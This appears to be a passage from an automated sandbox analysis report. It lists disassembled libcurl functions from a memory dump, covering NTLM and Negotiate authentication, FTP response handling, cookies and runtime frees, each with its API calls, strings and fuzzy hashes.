                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strrchrcurl_maprintf
                                                                                                                            • String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - Parsing started$Wildcard - START of "%s"
                                                                                                                            • API String ID: 1669751406-1301414817
                                                                                                                            • Opcode ID: 1a8fc2155270accc352df8052af9171a5c3bf574f5dc9894ba67ba9ca57e908c
                                                                                                                            • Instruction ID: 9391c6fe5e15b812a7646d35185527fbe367e4ccf26cf432ed6c2e05ae955e04
                                                                                                                            • Opcode Fuzzy Hash: 1a8fc2155270accc352df8052af9171a5c3bf574f5dc9894ba67ba9ca57e908c
                                                                                                                            • Instruction Fuzzy Hash: 76C1CFB5A006009FDB10CF28D881BD6BBE1EF45305F1440BAEA6DCB311E77AE995CB91
                                                                                                                            Function 6B6DDC80 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 249COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: Negotiate %s,Proxy-,00000000,?,?,00000000,?), ref: 6B6DDF14
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_maprintf
                                                                                                                            • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$HTTP$Negotiate auth restarted$Proxy-
                                                                                                                            • API String ID: 3307269620-819322280
                                                                                                                            • Opcode ID: e489e0eae87ce2d5eb39a0f60f79a278980c21ef3696f3ae3869fb877f665ec5
                                                                                                                            • Instruction ID: 15133ecfccf4a06f428529f0b3823a93b79b064ad66da7789d187a18409683f4
                                                                                                                            • Opcode Fuzzy Hash: e489e0eae87ce2d5eb39a0f60f79a278980c21ef3696f3ae3869fb877f665ec5
                                                                                                                            • Instruction Fuzzy Hash: 5A91D5B1A04208DFEB11DF68D881BDEBBF5EF45354F0445AAE848D7200D77AA954CFA1
                                                                                                                            Function 6B6CD6C0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 188networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B6CD874
                                                                                                                            Strings
                                                                                                                            • We got a 421 - timeout!, xrefs: 6B6CD81E
                                                                                                                            • *, xrefs: 6B6CD849
                                                                                                                            • FTP response timeout, xrefs: 6B6CD8BA
                                                                                                                            • QUOT string not accepted: %s, xrefs: 6B6CD89F
                                                                                                                            • FTP response aborted due to select/poll error: %d, xrefs: 6B6CD87B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: *$FTP response aborted due to select/poll error: %d$FTP response timeout$QUOT string not accepted: %s$We got a 421 - timeout!
                                                                                                                            • API String ID: 1452528299-2335292235
                                                                                                                            • Opcode ID: aced101b6f0d2049144f8280082dd895e95f631225b49926e849827feab5913c
                                                                                                                            • Instruction ID: 0874c80b2ea05d0c345062c39ef1b6625affef88698dffd48e7beb1c6405a3ec
                                                                                                                            • Opcode Fuzzy Hash: aced101b6f0d2049144f8280082dd895e95f631225b49926e849827feab5913c
                                                                                                                            • Instruction Fuzzy Hash: B15124B5E85208AFEF008E68DC817AF7BB5EF45315F1041B9ED18D7250F73996018BA6
                                                                                                                            Function 6B71F88C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 0-537541572
                                                                                                                            • Opcode ID: ea50324db6cb33a320eb262a67188cc611bff2e55c1d81c7d3d287e11bfec9c1
                                                                                                                            • Instruction ID: 681afcbb3768cec70ccecdb827ad89c17a90cd142cf2006036355d04afad0f03
                                                                                                                            • Opcode Fuzzy Hash: ea50324db6cb33a320eb262a67188cc611bff2e55c1d81c7d3d287e11bfec9c1
                                                                                                                            • Instruction Fuzzy Hash: E521C372D4D621BBDB21AE348E54B0E37A89F02BB0F190171FD65EF281D638E90186F0
                                                                                                                            Function 6B725EEE Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B725EB6: _free.LIBCMT ref: 6B725EDB
                                                                                                                            • _free.LIBCMT ref: 6B725F3C
                                                                                                                              • Part of subcall function 6B71F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0), ref: 6B71F800
                                                                                                                              • Part of subcall function 6B71F7EA: GetLastError.KERNEL32(6B7438A0,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0,6B7438A0), ref: 6B71F812
                                                                                                                            • _free.LIBCMT ref: 6B725F47
                                                                                                                            • _free.LIBCMT ref: 6B725F52
                                                                                                                            • _free.LIBCMT ref: 6B725FA6
                                                                                                                            • _free.LIBCMT ref: 6B725FB1
                                                                                                                            • _free.LIBCMT ref: 6B725FBC
                                                                                                                            • _free.LIBCMT ref: 6B725FC7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: a2040689eb20bcf9bb80bc7575afd7fe6432a9a444dbacbf3969c66c2c91fe63
                                                                                                                            • Instruction ID: 8490015a070ff96eed6462e3e5e9600e50114ee79f8ef0ee00795db7fb838ca7
                                                                                                                            • Opcode Fuzzy Hash: a2040689eb20bcf9bb80bc7575afd7fe6432a9a444dbacbf3969c66c2c91fe63
                                                                                                                            • Instruction Fuzzy Hash: EB113AB1945B04EAE720FBB0DE4BFCB779DBF00705F840A25F39AAA055DB79A5048660
                                                                                                                            Function 6B6C6AC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_maprintf.LIBCURL(%s%s%s%s%s%s%I64d%s%s,#HttpOnly_,6B72B98E,unknown,6B72B988,6B72B868,6B72B988,100C15FF,5D8B6B74,74DB8504,6B72B98E,00000000,00000000,00000000), ref: 6B6C6B55
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_maprintf
                                                                                                                            • String ID: #HttpOnly_$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
                                                                                                                            • API String ID: 3307269620-3622669638
                                                                                                                            • Opcode ID: 2b386d2d720d65f2000df3c4235a2cdee1005b524e700c303a5fada55f06d325
                                                                                                                            • Instruction ID: b6c878719c8e8cf22689bdd9906113c44b7ae4378d0f324395a13a202c7a8512
                                                                                                                            • Opcode Fuzzy Hash: 2b386d2d720d65f2000df3c4235a2cdee1005b524e700c303a5fada55f06d325
                                                                                                                            • Instruction Fuzzy Hash: DB1182E0700149EFEB148A65DE86B56FBE9AF49290F044699FC88DB302D375FD80C7A1
                                                                                                                            Function 6B71E4BC Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetConsoleCP.KERNEL32(6B7192EA,00000000,?), ref: 6B71E504
                                                                                                                            • __fassign.LIBCMT ref: 6B71E6E3
                                                                                                                            • __fassign.LIBCMT ref: 6B71E700
                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B71E748
                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6B71E788
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B71E834
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4031098158-0
                                                                                                                            • Opcode ID: 0ffd9e75a69c7097195ebbb27e89874d231e73db89907e2cbb00dec8f2fbe690
                                                                                                                            • Instruction ID: 5b0f770223592078968f418f10d9eae993668fe6a03bff6fa5f66275dd11342b
                                                                                                                            • Opcode Fuzzy Hash: 0ffd9e75a69c7097195ebbb27e89874d231e73db89907e2cbb00dec8f2fbe690
                                                                                                                            • Instruction Fuzzy Hash: A7D1AB75D0525C9FDF15CFA8CA809EDBBB5BF49304F28006AE865BB241D734AA46CB60
                                                                                                                            Function 6B6ED1F0 Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED266
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED27A
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED2CC
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED2F9
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED362
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED4C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 885266447-0
                                                                                                                            • Opcode ID: abeba5c7b734dbb949aebf491ab6ba2712da967b0e21801e9807bd08b76ab063
                                                                                                                            • Instruction ID: 0bff210bac09aa0e82eeb767b7841219199910d940991a58711b988c8a7a733c
                                                                                                                            • Opcode Fuzzy Hash: abeba5c7b734dbb949aebf491ab6ba2712da967b0e21801e9807bd08b76ab063
                                                                                                                            • Instruction Fuzzy Hash: CBA1C2B5E452049FDB10DF68C981BAA7BB5FFC5318F1482B9EC1C9B245DB34A94187B0
                                                                                                                            Function 6B704F30 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000004,?,?), ref: 6B70500B
                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000004,?,?), ref: 6B705012
                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B70501F
                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B705026
                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B705032
                                                                                                                            • VerifyVersionInfoA.KERNEL32(0000009C,00000033,00000000), ref: 6B70503F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2793162063-0
                                                                                                                            • Opcode ID: 21decbdcb315f7962a3fd6e15d39160b837ae5f06d18c8cc1e629239003f51eb
                                                                                                                            • Instruction ID: 736ebeac5ada70eccc33d4d94b24a8db049dced31ea6db216668527ade236c80
                                                                                                                            • Opcode Fuzzy Hash: 21decbdcb315f7962a3fd6e15d39160b837ae5f06d18c8cc1e629239003f51eb
                                                                                                                            • Instruction Fuzzy Hash: FD3177B0B44358AEEF20CA388D49F9F7BF8AB56704F0400DAB54C67281C6749E548B66
                                                                                                                            Function 6B706410 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 343COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • htonl.WS2_32(?), ref: 6B7065CA
                                                                                                                            • htonl.WS2_32(?), ref: 6B706626
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            Strings
                                                                                                                            • GSSAPI handshake failure (invalid security layer), xrefs: 6B7065BA
                                                                                                                            • GSSAPI handshake failure (invalid security data), xrefs: 6B706583
                                                                                                                            • GSSAPI handshake failure (empty security message), xrefs: 6B706561, 6B70681F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: htonl$curl_msnprintfcurl_mvsnprintf
                                                                                                                            • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                                                                                                            • API String ID: 3222853418-242323837
                                                                                                                            • Opcode ID: c567ce8b3f6d7b30e7ab2bcfdc1552b5b83c68f89f7c84d50e5e888a505edcb7
                                                                                                                            • Instruction ID: bb362314d800f6455e703211fc7a51064d1e5555f83308acc391911d4c65c96e
                                                                                                                            • Opcode Fuzzy Hash: c567ce8b3f6d7b30e7ab2bcfdc1552b5b83c68f89f7c84d50e5e888a505edcb7
                                                                                                                            • Instruction Fuzzy Hash: 57D157B5D00218DFCF10EFA8D955A9EBBF4FF09305F1040AAE819A7251DB3ADA55CB60
                                                                                                                            Function 6B6C95D0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 253COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ../$/..$/../$/./
                                                                                                                            • API String ID: 0-456519384
                                                                                                                            • Opcode ID: 3a209b9355066934c384658341f916efc798c89429c54a47877f8fc6c87f77b4
                                                                                                                            • Instruction ID: 74cc86f50262776a38eba761cb4f1e5dfc24a7a0adc735e7f0be7447b6d83bfe
                                                                                                                            • Opcode Fuzzy Hash: 3a209b9355066934c384658341f916efc798c89429c54a47877f8fc6c87f77b4
                                                                                                                            • Instruction Fuzzy Hash: A771E7E6E0D1819AD7131E3959957A3BFA6DB5324CFA800E5D8858B3C3E72BC509C273
                                                                                                                            Function 6B6C62C0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 199COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,?,?,?,?), ref: 6B6C6449
                                                                                                                            • curl_slist_free_all.LIBCURL(?), ref: 6B6C64F5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_slist_free_allcurl_strnequal
                                                                                                                            • String ID: Set-Cookie:$ignoring failed cookie_init for %s$none
                                                                                                                            • API String ID: 2653667558-4095489131
                                                                                                                            • Opcode ID: c04a9e43c608e988b8ab08cac2914bd87252cd6f4fd3f939b0895b11ed212d5f
                                                                                                                            • Instruction ID: ed3494ca292fb18c0a6f8d9c21dc291b9d4c093fceeee73f01ce50949e314523
                                                                                                                            • Opcode Fuzzy Hash: c04a9e43c608e988b8ab08cac2914bd87252cd6f4fd3f939b0895b11ed212d5f
                                                                                                                            • Instruction Fuzzy Hash: 6E6104F1D04380AADB019F649842BBB7B75DF1670CF0880E4ED49AB242E77A9505C7AB
                                                                                                                            Function 6B6DE0E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 179COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: NTLM %s,Proxy-,00000000,?,?,?,?,?,?,00000000,?), ref: 6B6DE253
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_maprintf
                                                                                                                            • String ID: %sAuthorization: NTLM %s$HTTP$Proxy-
                                                                                                                            • API String ID: 3307269620-3667642693
                                                                                                                            • Opcode ID: 3eeacf4ae96cf253503ce9e90f25a6b511ae178432059a97a03facbd9c23d962
                                                                                                                            • Instruction ID: c290fb65f753eebe35d5ccdb10b9f771e1867b7ffc5628669f04274b051f7315
                                                                                                                            • Opcode Fuzzy Hash: 3eeacf4ae96cf253503ce9e90f25a6b511ae178432059a97a03facbd9c23d962
                                                                                                                            • Instruction Fuzzy Hash: 67714EB5A00209EFDF11DFA8D9417AEBBF4FB49305F1041AAE858E7250D775AA50CFA0
                                                                                                                            Function 6B6DDFD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_strnequal.LIBCURL(NTLM,6B6DB6E6,00000004,00000DD0,?,?,?,6B6DB6E6,?,?,?,?,?,?,00000000,?), ref: 6B6DE00B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_strnequal
                                                                                                                            • String ID: NTLM$NTLM auth restarted$NTLM handshake failure (internal error)$NTLM handshake rejected
                                                                                                                            • API String ID: 482932555-2258391893
                                                                                                                            • Opcode ID: 07539ba38f4b514307c445e9e9dcb94fbc29e759067e62cf3087dd2135495ad6
                                                                                                                            • Instruction ID: d297fe22e99a46d020775a83e262795ef45ceac217235a4974b233311bf38f48
                                                                                                                            • Opcode Fuzzy Hash: 07539ba38f4b514307c445e9e9dcb94fbc29e759067e62cf3087dd2135495ad6
                                                                                                                            • Instruction Fuzzy Hash: F321E4F6A102056BEB105E74FC41B9ABBA9DF41268F144872FC48C7102E73AE665CAA0
                                                                                                                            Function 6B6F06B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_msnprintfcurl_mvsnprintf
                                                                                                                            • String ID: $lnk$...$...
                                                                                                                            • API String ID: 4251218765-1176918924
